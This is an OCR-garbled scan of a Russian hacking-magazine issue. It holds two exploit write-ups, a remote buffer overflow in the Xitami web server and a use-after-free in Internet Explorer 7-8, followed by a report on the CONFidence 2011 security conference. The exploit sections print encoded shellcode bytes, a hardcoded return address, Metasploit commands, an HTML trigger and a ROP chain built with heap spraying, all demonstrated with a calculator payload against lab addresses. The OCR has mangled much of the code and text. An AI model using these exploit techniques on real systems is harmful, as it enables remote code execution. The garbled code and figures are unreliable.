9.3 [АМ:МАС:М/Аи:М/С:СЛ:С/А:С] 


| ВЕЕР 


ХКаг! — ммеб/Ир-сервер, первоначально создаваемый с 1996 по 


ХПАМИМЛЕВ ЕК\УЕК 2.5В4: УДАЛЕН- 
НОЕПЕРЕПОЛНЕНИЕ БУФЕРА 


2000 годы конторой !Ма\мх, как бесплатный продукт с открытыми 
исходными кодами. Работает он как одиночный процесс и нетре- 
бует для своей работы больших объемов памяти. ХЦатипо скорости 
работы не дотягивает до быстрейших серверов, но по заверениям 
производителя является хорошо расширяемым решением. Более 
того, он поддерживает некоторое количество прикладных протоко- 
лов, атакже имеет веб-интерфейс, через который можно конфигу- 
рировать меб/Нр-сервер. 

Код эксплоита можно найти на популярном ресурсе ехр\©{-@.согп 
в разделе Кетое Ехро($5. Для академических целей мы его слегка 
модифицируем под себя. 


В самом коде скрипта автором приведена краткая справка поего ис- 
пользованию. Выглядит она следующим образом: 


#гоо@Б* : ^# са ВезК®ор/ 

#гоо@б* :^# ./Х1ат12_564.р1 

# Ептег уоцг Фагое* ' $ ТР (е.5.: 192.168.0.123) 
Н > 192. 168.178.5/ 

# [*] $епа1пя {Ве еу11 Веадег ат: 192.168.178.37 
# [*] ОК, ехр1о1фа1оп Бопе! 

# [*] СПеск р1еазе +ог {Ве $Ве11 


Вместо полезной нагрузки, размещенной в скрипте автором, забацаем 
классический калькулятор. Сказано — сделано. 


# т<Ерау1оаа м1пдом$ /ехес стд=са1с.ехе В | мзФепсоде -е х86/ 
а1рПа_т1хеа -+ рег1 

[*] х86/а1рва_т1хед зиссеедед м1ЕН $17е 461 (1{егаЕ1оп=1) 

ту $ФБи+ = 
"\х89\хе2\ха9\хеа\ха9\х72\х+4\х5а\х4а\хда\хда\х4а\х4а\х4а" . 
"\х4да\хда\х4а\х4а\х4а\х43\х43\х43\х43\х43\х43\х37\х52\х59". 
"\хба\х41\х58\х50\х30\х41\х30\х41\х6Ь\х41\х41\х51\х32\х41". 
"\х42\х32\х42\х42\х30\х42\х42\х41\х42\х58\х50\х38\х41\х42". 
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ЕХРЕОП$ 
ВЕМЕМ 


ЕХРЕОП$ 


ЕХРЕОТ$ 
ВЕМЕ\У 


= 


ЕХРЕО$ 
РЕЗУТЕ 


ЕХРЕОП$ 


топи Реборарг - ебориег в - [СР ПАееа0 ОООСНУНАО , по ее ив 


ОЗ СЖ ИГ И Ге пт БЕРЕБЕТОХ 7 


еее 38| Таким образом стек выглядит после перезаписи (видим стандартную 
р я В Е К ВС а ТИ И 
АААДА..., начинающуюся садреса ОхООс8ее8: 


ООСЗЕЕАД 004А27С57 М|У. АЗСТТ 41 ‚ "АААААААААААААААААААААААААА 
ААААААААААААААААААААААААААААААААААААААА" 

ООС8ЕЕА8 00492274 ф"Т. АЗСТТ "%$ %4 %а:%а:%а %а" 

ООСЗЕЕАС @90СЗЕЕЕЗ июИ. АЗСТТ 41 , "ААААААААААААААААААААААААА 
АААААААААААААААААААААААААААААААААААААААА" 


Пробегаем по пор-цепочке до полезной нагрузки 


"\х75\х4а\х49\х49\х6бс\х58\х68\х4с\х49\х45\х50\х43\х30\х43". 


"\хз@\х45\х30\х46\х39\х4а\х35\х50\х31\х58\х52\х51\х74\х4с". оОСЗЕЕВО @90С8ЕЕОБЗ Шки. 
"\х46\х43\х62\х54\х70\х4с\х4Ь\х50\х52\х54\х4с\х4с\х46\х52". @ОСЗЕЕВА @0СЗЕЕОС Ьюи. 
"\х72\х45\х44\х4с\х4б\х51\х62\х45\х78\х56\х6Р\х4с\х77\х50". О0СЗЕЕВЗ8 @0СЗЕЕЕ@ аюИ 
"\х4а\х54\х66\х56\х51\х49\х6+\х54\х71\хА+\х30\х4с\хбс\х47". ООСЗЕЕВС @90СЗЕЕЕ4Д дюи. 
"\хас\х51\х71\х51 \хбс\х43\х32\х54\хбс\х51 \х30\ха4Б\х71\хбБа". @оСЗЕЕСО @90С8ЕЕПБА Фюи. 
"\х6+\х54\х4а\х43\х31\х5а\х67\х58\х62\х5а\х509\х52\х72\х50". 00С8ЕЕС4 @0А9Е2АЗ Ёт 
"\х57\х4с\х4Ь\х56\х32\х54\х50\х4с\х46\х50\х42\х45\хбс\х43". О0С8ЕЕС8 600А1840С Ь"У 
"\х31\х58\х50\х4с\х4б\х43\х70\х51\х68\хАЕ\х75\хАР\х30\х43". воСзЕЕСС 00000001 # 
"\х44\х52\хба\х45\х51\х5а\х7@9\х52\х70\х4с\х4Ь\х51\х58\х45". восзЕЕБО 00000000 
"\х48\хде\х6Ь\х43\х68\х45\х70\х47\х71\х49\х43\х4а\х33\х45". восзЕЕОЛ 00000000 
"\хбс\х51\х59\х4с\х46\х54\х74\х4е\х6Ь\х45\х51\х4Ь\х66\х54". @0с8ЕЕОЗ 00000000 
"\х71\х4Ь\х4+\х56\х51\х49\х50\х4е\х4с\х5а\х61\х58\х4+\х56". @осзЕЕОС 00000000 
"\хба\х47\х71\х5а\х67\х45\х68\х4Ь\х50\х54\х35\х4Ь\х44\х43". ФосзЕЕЕО 00000000 
"\х33\х51\хба\х4Ь\х48\х45\х6Ь\х43\х4а\х47\х54\х50\х75\х5а". @оС8ЕЕЕД 00000000 .... 
"\х42\х43\х68\х4е\х6Ь\х50\х58\х47\х54\х45\х51\х5а\х73\х45". О0СЗЕЕЕЗ 41414141 АААА 
"\х3з6\х4с\х4Ь\х56\хбс\х52\х6Ь\х4е\х6Ь\х56\х38\х45\х4с\х56". ФОСЗЕЕЕС 41414141 АААА 
"\х61\х49\х43\х4е\х6Ь\х47\х74\х4е\х6Ь\х43\х31\х5а\х70\х4с". ООСЗЕЕЕРО 41414141 АААА 
"\х49\х50\х44\х47\х54\х56\х44\х51\х4Ь\х43\х6Ь\х43\х51\х51". ОоОСЗЕЕР4 41414141 АААА 


"\х49\х50\х5а\х56\х31\х46\х4+\х4а\х3@\х51\х48\х51\х4+\х43". 
"\хба\х4е\х6Ь\х47\х62\х5а\х46\х4+\х76\х43\хба\х59\хба\х47". 
"\х71\х4с\х4а\х4е\х65\х58\х39\х43\х30\х43\х30\х45\х50\х52". 
"\х70\х51\х78\х50\х31\х4с\х46\х52\х4+Е\хА\х77\хА6\хА+\х49". 
"\х45\х4+\х4Ь\х4с\х30\х4с\х75\х4с\хб2\х43\х66б\х43\х58\х4с". 
"\хбб\х4с\х55\хда\хба\хА+\х6а\х4Ь\х4+\хде\х35\х47\х4с\х43". 
"\х36\х43\х4с\х54\х4а\х4Ь\х39\х4Ь\х46\х4а\х30\х52\х55\х45". 
"\х55\х4+\х4Ь\х50\х47\х52\х33\х51\х62\х50\х6+\х52\х4а\х43". 
"\х3@\х56\х33\х4Ь\х4Р\х46\х65\х45\х33\х50\х61\х52\х4с\х50". 


"\хб3З\х56\х4е\х43\х55\х50\х78\х52\х45\х47\х70\х41\х41"; 


Вставляем данное добро в скриптХКатт!2_564.р(, генерирующий 
рабочий эксплоит, поднимаем сервер, запускаем скрипт, вбиваем р- 
адрес сервака и наблюдаем возникающий из ниоткуда кулькулятор. Ну 
атеперь немного подробней. Перезапись стека происходит на вызове 
функции _5зсапё: 


.Техе:0042АЗ80 ри$П еах 

.Техе:0042АЗ8Е 1еа еах, [езр+7СИ+уаг_58] 
.Сехф:0042АЗ392 ри$й есх 

.Техе:0042АЗ93 ризП едх 

.Сех{:0042АЗ94 риз$П отР5еф а0$0000 ; "%а %$ %а %а:%а:%а" 
.Техт:0042А399 

.Техе:0042А399 1ос_42А399: ; СОБЕ ХВЕЕ: $и6_ 42А1Е0+108#) 
.Техф:0042АЗ99 ризй ет ; $гс 
.Техе:0042АЗ9А са11 _55сапф; <--- атата 

.Сехе:0042АЗЭЕ тоу есх, [е5р+8СИ+уаг_5С] 
.Техе:0042АЗАЗ аа езр, 201 
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Сразу же после всех этих ААААА... будет располагаться адрес воз- 
врата, которым мы переписали первоначальный адрес возврата. Так 
какв данном варианте эксплоита не ставится целью обход ОЕР'а, то 
и управление в дальнейшем нам надо будет передавать на стек. По- 
сему необходимо искать что-то наподобие ризВ езр — ге{. 

Сразу краткое замечание по поводу кода эксплоита. Необходимо 
внимательней смотреть на адрес, которым будет перетираться ориги- 
нальный, поскольку все это хардкод. На моей системе адрес ризВ езр 
— ге немного отличался отавторского: 


ВЕТ = \х5Э\хаБ\хав\ хе 
# и52_32.411 ризИ Е$Р — геф — (\1паом$ ХР $РЗ — [Еп]). 


На моей системе: 


ФВЕТ = '\х5-\хаБ\хаэ\хт": 


Посмотреть данные адреса можно либо простым поиском по опкодам 
0х54,Охс3 (ризВ езр — гей], либо при помощи плагина к пит ОБд под 
названием руейпдадаг. Каким образом использовать руейпдаааг, можно 
узнать при помощи команды 'изаде руеЙпда@Яаг с дальнейшим созерца- 
нием результатов исполнения вышеприведенной команды в окне логов 
[пп 050. 

После того как мы дойдем до последнего геГа, на вершине стека будет 
лежать адрес 0х/1а9 2653. Исполняется гЕ{п, далее выполняются ко- 
манды ризП езр — гп, мы прыгаем на пор-цепочку, по которой в конце 
концов добираемся до полезной нагрузки. 


> 045 


ЕХРЕОП$ 
ВЕМЕМ 


ЕХРЕОП$ 
ВЕМЕМ 


пееьыенай р. 


Получение вредоносных данных от клиента 


ТАКСЕТУ 
ХКагт! 2.564 


ОШОТЮМ 
Обновиться до более свежей версии 


МУП -0501Е 
МЪНТМИСОВДЕСТЕЕЕМЕМТ ЦЕ 
АЕТЕК ЕКЕЕ 


С\5$5\2 
9.3 [АМ: МАС: М/Аи:М/С:СЛ:С/А:С] 


ЕЗЯ 


Очередная уязвимость в |пегпе{ Ехр{огег 7-8. Эксплоит был 
оформлен автором в виде модуля для Ме&азрок. Данный модуль 
эксплуатирует уязвимость типа изе-аКег-!гее, достигаемую в 


том случае, когда задан неверный тэг <оБ|ес{> и другие элементы 
перекрывают собой на экране то место, где тэг объекта должен 
был бы оказаться после генерации. В результате невалидности 
элемента Мепит ИСОБ]е‹{Еетепе, происходит его освобождение 
в памяти. Однако, объект мб ит ИСОир(ау для страницы про- 
должает хранить ссылку на освобожденный <оБ]ес{> и пытается 
вызывать функции, в аргументах к которым будетуказан данный 
освобожденный элемент, что, собственно, и приводит к уязвимо- 
сти типа ч5е-аКег-{гее. 


ЕХРЕО! 

Справку по использованию эксплоита можно получить при по- 
мощи стандартной команды Меазр[ои «5Пом/ орНопз». Вот пример 
использования этого сплоита: 


ШУ > 

и5е ехр101* /м1паом$ /6гомзег/т$11_050_т$Нт1_соб]есфе1етепт* 
15 ехр1о1* (...) > зе $К\УНО$Т 192.168.0.63 

ЪК\НОЗТ => 192.168.0.63 

т ехр1о1* (...) > зе РАУГОАВ м1паом$ /ехес 

РАУЕОАР => м1пдом$ /ехес 

15+ ехр1о1* (...) > е{ СМО са1с.ехе 

СМО => са1с.ехе 

15+ ехр1о1* (...) > ехр1о1 4 

[*] Ехр101* гипп1п$ аз Баскёгоипа 3оЬ. 


[*] Оз1пё УВЕ: НЕр://192.168.0.63:808@/56+ЗмЕВК] 


[*] 5егуег з%аг%ед. 
15+ ехр101*(т$11_050_м5Ит1 _соб]есже1етепт{) > 


Проходим по ссылке на клиенте (ВИ р://192.168.0.63:8080/ 
6 {ЗмЕВК} и видим возникающий калькулятор. Если закомменти- 
ровать один из тегов втесте (дабы уберечь |Е от падения}, а затем 


> 06 


ЕХРЕОП$ 
ВЕМЕМУ 


зайти в Оеуерег Тоо|$ и посмотреть на текущее состояние [ОМ, 
элемент <оБ]ес{> показываться не будет, скорее всего, потому, что 
не был указан тип объекта, который у него должен быть: 


<Вт1 > 

<Боау> 

<5сг1рф 1апвиаве=')ауа$сг1р*' > 

доситеп* .Боау.1ппегНТМЕ += "‹об]ес* а115п='г12й{' 
Юзрасе=' 1000" итатп='1000' >ТАб_1</об]ест>"; 

// аоситеп* .Боау .1ппегнтМЕ += "‹а 14='Фа_3' зфу1е='Б 
о{фот: 200ст; Ноа* : 1е { ;урада1п=-1е+* : -1000рх; Богаег- 
ит аеЙ : 2000рх ; тех -1п4депт : -1000рх' >ТАСб_3</а>"; 
доситеп* .Боау.1ппегНТМЕ += "ААААААА"; 

досичтеп* .Боау.1ппегНТМЕ += "<5%гопз зфу1е= 
'Ропф-$17е:19000рс;тагё1пт:аифо -1000ст ацфо аифо; ' 
Ч1г=' 1%г'>ТАб_11</5%гопё>"; 

<И/5ЕгГарЕ> 

</Боду> 

</Нт1 > 


Зная это, вскинем свой взор на стек вызовов, полученный ПОСЛЕ 
падения, это должно пояснить нам суть остального: 


0:008> К 

СИ11аЕВР ВефАдаг 

90206е350 63602718 тт] ! СЕ1етеп* : :Эос+0х2 

90206е36с 636026а3 т$Пт1 ! СТгееМосае : : СотриеРогта*$+9хЬ9 

0206е618 63612а85 т$Пт1 ! СТгееМосае : : Сотри{еРГогта*$Не1рег+0х44 

0206е628 63612а45 т$Пт]1 ! СТгееМосае : :бе{РапсуГогта{ТпаехНе1рег 
+90х11 

0205е638 63612а2с тзПт1 ! СТгееМоае : :беЕРапсуРЕогта{Не1рег+@х+ 

90206е64с 637429аб т$Пт]1 ! СТгееМоае : :бе{РапсуЕогта*+0х35 

90205е654 63742906 тзНт1 ! СЕ1пеСоге : :АО_беРапсуЕогта*+0х23 

0205е688 6367593 тзНт1 ! СКеса1сЁ1пеР*г: :Кеса1сМаг#1п$+0х19а4 

0206ее80 6369985+ тт] ! СО1$р1Тау : : Веса1с11пе$+9х6е4 

9205еф5с 6361с037 тзПт1 !СО15р1Тау : : Ма1{РогВеса1с+09х208 

920Бефас 6365144е тзПт1 ! СЕТомауои* : : Мо 1Ру+@9х7а7 

9205е+68 63601742 тзНт1 ! №о+1ТуЕ1етеп*+0х41 

90206+00с 6365134+ тт] ! СМагКур: : ЗепаМо{1Яса*1оп+9х60 

0206+034 636666с1 тзНт1 ! СМагКур: : Мо 1Фу-+@ха4 

90206+07с 63616107 тзНт1 ! СЕ1етепх : : Зеп@ Мо 1Яса*1оп+@9х4а 

9206+09а0 63548267 тзПт1 ! СЕ1Тетеп* : : ЕпзигеКеса1с№*1+у+0х15+ 

0206+11с 635сс225 тзНт1 !С01$р1ауРо1п*ег: :Моме/п1*+9х262 

0206+208 635сс092 тзПт1 ! СНТМЕЕЯ1 ог: : Аа] и Ро1п*ег+09х16+ 

90206+23с 635са2а{ тзНт1 ! СЕа1ТгаскКег: : Аа]ди$Ро1пегРогТпзег* 
+@х8Ь 

0206+298 635са123 тзНт1 !ССаге{ТгасКег: :Ро$11опСаге{А*+0х141 


Основным моментом, который приводит к падению, является то, 
что элемент <об]ес{> был первоначально добавлен в некий список 
элементов, чтобы быть отображенным. Затем элемент обес был 
удален, поскольку стал невалидным, и стало нечего отображать. 
Ноонне был удален из вышеобозначенного списка. Далее должно 
произойти нечто, в результате чего [Е попытается вызвать метод 
на освобожденном объекте, что и приведет к и5е-аКег-1гее. 

То есть по сути, нам необходимо инициировать освобождение эле- 
мента <оБ]ес{>, получить указатель на данные, которые мы контро- 
лируем для того, чтобы перезаписать ими освобожденный объект, а 
затем сделать то, что может привести к вызову функций с элементом 
оБ]ес{ в качестве одного из аргументов. 

Эксплоит для |Е 7 и [Е 8 с отключенным ОЕР перезаписывает 
СОЦесЕетеп значениями Ос0с0с0с: 


ш$Ит1 ! СЕ1етеп* : :Оос: 
3с+76680 8601 то\у еах,амога р*г [есх] 


; 45:0023:147+00а7=9с9с9с9с 
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ЕХРИО 


15 


ЕХРЕОТ$ 
ВЕМЕ\У 


ЕХРЕОТ5 


РЕ\/ЕЗАГ 


СЛасо ПиеЯ Срегононя Мопааег 
$ ПИ ‘прабпавгы я |Гберигта Гм 


| Еее и 


| Е 


Интерфейс СуОМ запускается через обычный браузер 


3с+76682 865070 тоу еах, амога рег [еах+701] 
; 45:0023:0с0с0с7с=@с0с@с@с 
3с776685 ГРа2 — ‹са/11 еах 
; {<УпТоааед_55рс.а11>+9хс@сосвЬ (9с0с0с0с)} 
; <-- (исполнение цепочки пор$ + °Пе11соде) 
3с+76687 86400с тоу еах,амога рег [еах+09Сп] 
3ЗСР76Ь8а с3 РЕ 
Эксплоит для [Е8 свключенным [ЕР требует применения техники 
КОР-программирования: 
1. СОЦе‹{Еетеп( перезаписывается значениями 0с0с0с(с; 
2. Используя Пеар-зргау, помещаем КОР-последовательность по 
адресу Ос0с0с(с; 
3. По адресу 0х23000000 размещается цепочка пор$+$ВеЦсоде. 
Как только все будет выполнено, КОР-последовательность примет 
следующий вид: 


9с@сос0с 7с809а+1 ; 1 
90с90с0с10 7с901аь3 ; 2 
0с0с0с14 7+000000 ; 
90с90с90с18 00004000 ; 
90с9с9с1с 00003000 ; 
СОММТТ | МЕМ_ВЕЗЕВ\Е 
90с9с9с20 000000490 ; 1: 

90с9с@с24 7+001000 ; 3:пор5+$Пе11соде (третий возврат) 
90с90с0с28 7+001000 ; 2:тетсру: а$* 
2: 
2, 


: Кегпе1 32 ! \1гиа1А11ос (первый возврат) 
: 15911 !метсру (второй возврат) 
1:\/1гфиа1А11ос: 1рАдаге$$ 
1:\/1гфиа1А11ос : 9м512е 
1:\/1гЕца1А11ос: НАТ] оса 1опТуре МЕМ_ 
\/1гЕиа1А11ос:ЯРгофесе гих 


9с9с9с2с 23000100 ; 
0с0с0с30 00002++Т ; 2:тетсру: $17е 
90с9с9с34 Бе9е2688 ; мусор 


тетсру :; $ ГС 


90с90с0с74 ае2+62е1 ; мусор 

90с90с@0с78 а19314еб ; мусор 

9с0с@с7с 773е3+18 ; сотсЕ132 !СТтавеЕ 15%: : _Т55$ате06б)ес*+@0х40 
; указатель стека 

90с90с0с80 3825а247 ; мусор 

90с90с0с84 88+8а844 ; мусор 

90с0с0с88 05666421 ; мусор 


Моментвызова тип ИСЕ@етеп"::Оос после данного события: 


т$Ит1 ! СЕ1етеп* : :Оос: 
3с+76680 8501 то\ еах,амога рег [есх] 
; 45:0023:35а00002=@9с9с@с@с 
3<+76682 865070 тоу еах, дмога рег [еах+701] 
; 95:0023 :0с0с@0с7с=773е3+18 
3©+76585 +42 са11 ейх ; указатель стека 
; {сотсЕ132 |! СТтавеЕ15$* : :_Т55$ате0б]ес{+09х4@ (773е3+18)} 


Первая часть КОР-последовательности представляет из себя 
указатель на код, производящий обмен езр сеах (О0с0с0с0с]: 
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ЕХРЕОП$ 
ВЕМЕМ 


ЕХРЕОП$ 
ВЕМЕМ/ 


0:007> и сотсЕ132 ! СТтаве! 15%: : _Т55$ате0б]ес{+40 1?2 
сотсЕ132 | СТтаре!1${ : : _Т$5атео0бес*+0х40: 


773е3+18 94 
773е3+19 с3 


хспв еах,е5р ; езр == 9с@с@с@с 
ге ; возврат в Кегпе1 32 !\/1гца1А11ос 


После данных телодвижений КОР-последовательность будет вы- 
глядеть следующим образом: 


90с90с0с10 7сэ0таьз ; 2: пеа11 !тметсру 

(второй возврат) 

0с0с0с14 7+000000 ; 1:\/1гфиа1А11ос : 1рАдаге$ $ 

0с0с0с18 00004000 ; 1:\М1геиа1А1Тос: ам$1те 

90с9с0с1с 00003000 ; 1:\/1гЕиа1А11ос:НА11оса*1опТуре МЕМ_ 
СОММТТ | МЕМ_ВЕЗЕВ\Е 
90с9с0с20 00000040 ; 1 
90с9с0с24 7+001000 ; 3 


\/1гЕца1А11ос:ЯРгофесе гих 
пор5+$5Не11соде (третий возврат) 


ов 
90с0с0с28 7+001000 ; 2:тетсру: а$* 
9с9с9с2с 23000100 ; 2:тетсру : гс 
90с9с0с30 09@02+++ ; 2: тетсру: $17е 


В Кегпе[3 2 М ца{АЦос выделяется 0х4000 байт с атрибутами 
чтение/запись/исполнение по адресу 0х71000000, и мы возвраща- 
емся в "(а !тетсру. На данном этапе стек выглядит следующим 
образом: 


90с9с9с24 7+001000 ; 3:пор$+5Не11соде (третий возврат) 


90с0с0с28 7+001000 ; 2:тетсру : а$* 
9с9с9с2с 23000100 ; 2:тетсру : гс 
90с9с0с30 00002 ; 2: тетсру: 517е 


п(а(!тегпсру затем скопирует Ох? байт из 0х23000100 [по 
данному адресу находится цепочка порз + НеЦсо4е} по адресу 
0х71001000 (гуих-память, была выше выделена Уй{иа[АЦос’ом] и 
вернет управление на цепочку порз + зПеЦсоде, располагающуюся 
по адресу 0х71001000: 


пфа11 !тетсру: 


7еЭ91063 55 рчзй ебр 

7901464 8Бес тоу ебр,езр 

7с901аЬ6 57 ричзИ еа1 

7с901а67 56 рчзИ е$1 

7с901аЬ8 86750 сто\у е51 , амога рег [ебр+9си] 


; 55:0023:0с0с0с2с=23000100 

7сэ@лаьЬ 864910 тоу есх,амога рег [ебр+1091] 
; 55:0023:0с0с0с30=00002+++ 

7с9@1аБе 8657908 тоу е41 , амога рег [ебр+8] 
; 55: 0023:0с09с0с28=7+001000 


7с901аеб +3а5 
; скопировать пор$+$Пе1]со4е по адресу 90х7+001000 


гер мо\$ амога р*г ез: [еа1 ] ‚ амога рег [е$51] 


7с901+4а с9 
7с901+4е с3 
; возврат по адресу 7+0010900 (попадаем на 


]еауе 
ге{ 


; цепочку пор$ + °Ие11соде) 


|егпеЕхр(огег 7-8 


ЗОШИЛЮМ 
Поставить обновления. == 


› 047 


| № ЭАлексей Синцов, 019Ка{ бесигИу (мег. сот/аз!тЕзоу} 
Александр Матросов, ЕЗЕТ (мег. сот/та&гозоу) 


СОМЕОЕМСЕ 


Омето хакерской конференции 


ольше из первых р 


э СОМНОепсе — уникальное событие по своей атмосфере и 
открытости. Помимо именитых докладчиков, здесь всегда ждут 
новых людей, которые готовы представить результаты интересных 
исследований в области ИБ. Единственное ограничение — 
выступление должно будоражить разум не только докладчика, нои 


быть интересно присутствующим. 


От редакции: 

Конференция СОМЕ@епсе как обычно прошла в 20-х числах мая в 
прекрасном польском городе Кракове. Она давно уже зарекомен- 
довала себя как лучшее событие Т-зесигцу в Восточной Европе, 
да и чего таить — это одно из лучших хак-событий Европы вообще 
[Наряду с В(аск На*, НТВ, НазНОауз, 5ОЧЕВСЕ, ВгиСоп, Оеер5ЕС). 
За пять лет докладчиками на этой конференции были такие люди, 
как Брюс Шнайер, Дэн Камински, Джоанна Рутковская, Якоб 
Аппелбаум, Антон Чувакин и многие другие. А в этом году с докла- 
дами приехали двое наших авторов — Алексей Синцов и Саша 
Матросов, выступавший со своим коллегой из ЕЗЕТ Евгением 
Родионовым. И хотя мы редакцией и сами съездили посмотреть на 
это чумовое действие, отчет о СОМЕ!Чепсе предложили написать 
непосредственно участникам событий. Так что то, какой конферен- 
цию увидел Леша Синцов, и комментарии Саши Матросова читай 
ниже. 


› 048 


Атмосфера 

Первое, что хочется сказать: на мероприятии присутствует некая 
«живая» хакерская атмосфера, что позволяет нам, как докладчи- 
кам, так и посетителям, очень душевно пообщаться друг с другом 
в «неофициальной» обстановке :]. Сама конференция проходила 
в комплексе водонапорной станции, открытой в еще 1901 году, так 
что антураж в стиле «индастриал» помог разнообразить общее 
впечатление. Мероприятия подобного рода в большинстве своем 
проходят в скучных кондиционируемых залах отелей, а тут выбра- 
но очень правильное место. Стоит к этому добавить, что террито- 
рия конференции не ограничивалась только помещениями: сюда 
также входила и зона под открытом небом, где были организова- 
ны всякого рода спортивные игры (волейбол, футбол}, установ- 
лены удобные тенты и готовились вкусности вроде мяса гриль 

и шашлыков (к слову, на польском это блюдо называется точно 
так же]. Конечно, не обошлось без привычных для данного меро- 
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Александр Матросов из ЕЗЕТ рассказывает о ТО4 


приятия атрибутов — игровых консолей, старых игр, 
и, само собой, хакерских соревнований. Проводились 
и просто «алко-трешовые» конкурсы, вроде такого: 
кто полуголым пробежит по сцене во время доклада... 
Александру Матросову и Евгению Родионову повезло, 
ведь именно во время их выступления кто-то выпол- 
Нил эту «ачивку» :]. Были и классические конкурсы, 


вроде СгаскМе и КеуегзеМе или «обойди ГПрртд Ро 
|Р5». Кстати, ЕЗЕТ уже на протяжении многих лет 
является спонсором этого мероприятия и традиционно 
разрабатывает для него специальный крякми. К сожа- 
лению, в этом году не нашлось ни одного человека, 
который смог бы пройти его полностью. До сих пор он 
доступен онлайн и ты можешь испытать себя ( 

}. «Видимо, 
просто на этот раз не было Димы Склярова, который 
уже традиционно занимает все первые места на 


наших конкурсах», — шутит Саша Матросов. Короче 
говоря, СОМЕ!епсе 2011 отметилась всем, без чего ни 
одна добротная хакерская конференция обойтись не 


может. Тем не менее, на таких ивентах самое Главное 
— эго доклады, так что поговорим о них подробнее. 


Доклады 


№ Сетевая безопасность — с нулевого уровня 

Уоиг Меммогк 5есиТу Зай$ а! 1ауег Гего 

Докладчики: Девиант Оллам, Бабак Джавади 

Этот доклад, который перешел в воркшоп от американ- 
ских пен-тестеров, был на открытии. Пен-тестеры-то не 
простые. Они занимаются проникновением на физи- 
ческом уровне, то есть проверяют качество замков, 
пытаясь вскрыть их, не разрушая механизма дверей, 
петель или стен. Очевидно, что большинство воров про- 
сто высверливают замки, не заботясь о скрытности. Но 
вот если следов разрушения нет, значит ли это, что твою 
дверь не открывали? Значит ли это, что твой ящик в 
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офисе был закрыт и недоступен, пока ты был на обеде 
или дома? Вообще говоря, если камер нет — то это не 
очевидно. А учитывая, как некоторые компании экономят 
не только на замках от офисных дверей, ящиков столов 
или личных шкафчиков, но и на замках от щитовых 

[где счетчики, или рубильники, или управление про- 
чих коммуникаций), то такие пен-тесты показывают, что 
потенциальный нарушитель может получить физический 
доступ так, что об этом еще долго никто не узнает. В 
любом случае, доклад был зрелищный и интересный, 
хотя и не новый. Но ребята так же рассказали и о новых 
замках, которые они сейчас пытаются вскрыть, и судя по 
прогрессу — они будут, все же, взломаны :]. Эти ребя- 

та — большие любители устраивать конкурсы по взлому 
замков, и были замечены на многих других конференци- 
ях, таких как ЕКорагу, к примеру. А на их сайте ( 

} можно прикупить раз- 
личные наборы отмычек, и, с их собственных слов, они 
без проблем готовы их доставить почтой, в том числе и 
в Россию. После доклада любой желающий мог попро- 
бовать повскрывать замки [и наручники] разными мето- 
дами — отмычками, специальным ключом и молоточком 
и даже пивной банкой! Кроме того был организован 
конкурс на тему взлома замков: на участника одевали 
наручники, он должен был открыть все замки и снять 
наручники. Победил в этом конкурсе Кепдегтап, извест- 
ный в «узких» кругах канадский хакер, чуть ли не посто- 
янный спикер на ОеТсоп’е. Он менее чем за минуту снял 
наручники (которые, кстати, были надеты «за спиной»), 
после чего открыл все замки. 


Ш Запрещенное изображение: аспект безопасно- 
сти 5\С в вебе 
Тре Гогодаеп таде — 5есийу итрас{ о! 5са!аЫе 


\Месюг СгарМс$ оп Те \МЛАМ/М/ 
Докладчики: Марио Хейдерич 
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› Чуа 


Все презентации 
СОМЕдепсе 2011 ты 
найдешьна нашем 
0\УО0. 
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Алексей Синцов из Обйа! $еситу со своей женой Светланой 


Доклад Марио был посвящен скрытому и опасному потенциалу в 
формате 5\УС. Собственно Марио (ведущий разработчик РНР-105$ и 
фанат кошек] рассказал про формат 5\С, про то, как в его телесах 
можно запрятать хитрую Х$5, используя спецификацию протокола. 
Все это открывает дорогу для реализации атак там, где, например, 
в лоб не пройти (как, например, в случае, когда мешают [105 или 
МАЕ). 


Ш Взлом птицы в небе: месть Апогу В!а$ 

Наскпа а Виа шт Те $Ку: ТПе Кеуепде о! Апогу В!га$ 

Докладчики: Джим Геоведи, Рауль «МоБоду» Чьеса 

Веселый доклад Джима и Рауля о методах взлома спутников, а точ- 
нее о проблемах безопасности, которые имеют место быть в этой 
области. Да, так просто. Вообще есть серия докладов на эту тему, от 
того же Джима и других авторов, но данный доклад был про спец- 
ифику «наземной» службы и ее проблемы: халатность, устаревшее 
ПО [Например, по причинам совместимости, многое ПО работает на 
ооочень старых версиях ОС, вроде \\МтпМТ 4.0 в центрах управле- 
ния), отсутствие шифрования [Р-канала (шифрование увеличивает 
объем и нагрузку, поэтому де-факто — оно поддерживается, но, как 
правило, выключено]. Помимо теории, Джим показал несколько 
демонстраций, как ему удалось внедриться в протокол общения 
между спутником и командным центром, показал наглядные видео 
и картинки: от основ ТОМА до спецификаций протоколов. В общем, 
интересная презентация [скорее даже не слайды интересны, а 

то, что говорили докладчики] от интересных людей. Кто не знает 
Рауля, — этот старый хакер вторгся в сеть Банка Италии, за что был 
арестован :]. Как он утверждает, все взломы были ради любопыт- 
ства и интереса — теперь у него своя [Т-зесиг(у фирма, которая 
оказывает разного рода услуги тем же банкам! Также у них своя 
лаба, где они пишут эксплоиты и проводят исследования. Ребята 
правильные: выступают на конференциях и дают о себе знать 
делом, а не красуются за сухими стендами и сертификатами (хотя 
без этого, не могу соврать, никуда]. 


Ш Современная эксплуатация кучи через [о\м/ ЕГгадтетанНоп 
Неар 

Моадет Неар ЕхройаНоп ияпа Ме 1юо\м/ Гадтетаноп Неар 
Докладчики: Крис Валасек 

Этот доклад американца (он из Питтсбурга, и, кстати, выра- 

зил радость за победу «земляков» на РНО СТЕ в Москве, когда 
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Александр поведал ему об этом] ожидали многие. Очень хариз- 
матичная и веселая личность :]. Доклад был посвящен защитным 
техникам корпорации М!сгозой от атак по типу переполнения буфера 
в куче. Но что-то я не то сказал, конечно, доклад, как раз наоборот, 
посвящен обходу защиты в последних версиях \\Ипдом/5. Все пока- 
зано было на примере эксплоита для $ ЕТР, в котором приуставала 
уязвимость, однако считалось, что захватить контроль (влиять на 
регистр Е!Р] невозможно. Однако Крис использовал новую «фичу»— 
[ЕН (1ом/ Егадгпег(аноп Неар). Если эта штука «включена», то воз- 
можно обойти защиты от М5. Осталось только включить эту «штуку», 
что можно сделать, создав большой пул подключений к ЕТР-сервису, 
тогда ОС для эффективности врубает (ЕН, что используется для 
последующей атаки. Мы можем перезаписывать поле заголовка 
ЕгееЕг{гуОН5е\, и, в конечном счете, перезаписать ЕР. Все конечно 
намного сложнее, и я описал лишь 5% идеи, но истина где-то рядом. 


Ш Победа над х64: эволюция руткита ТО 

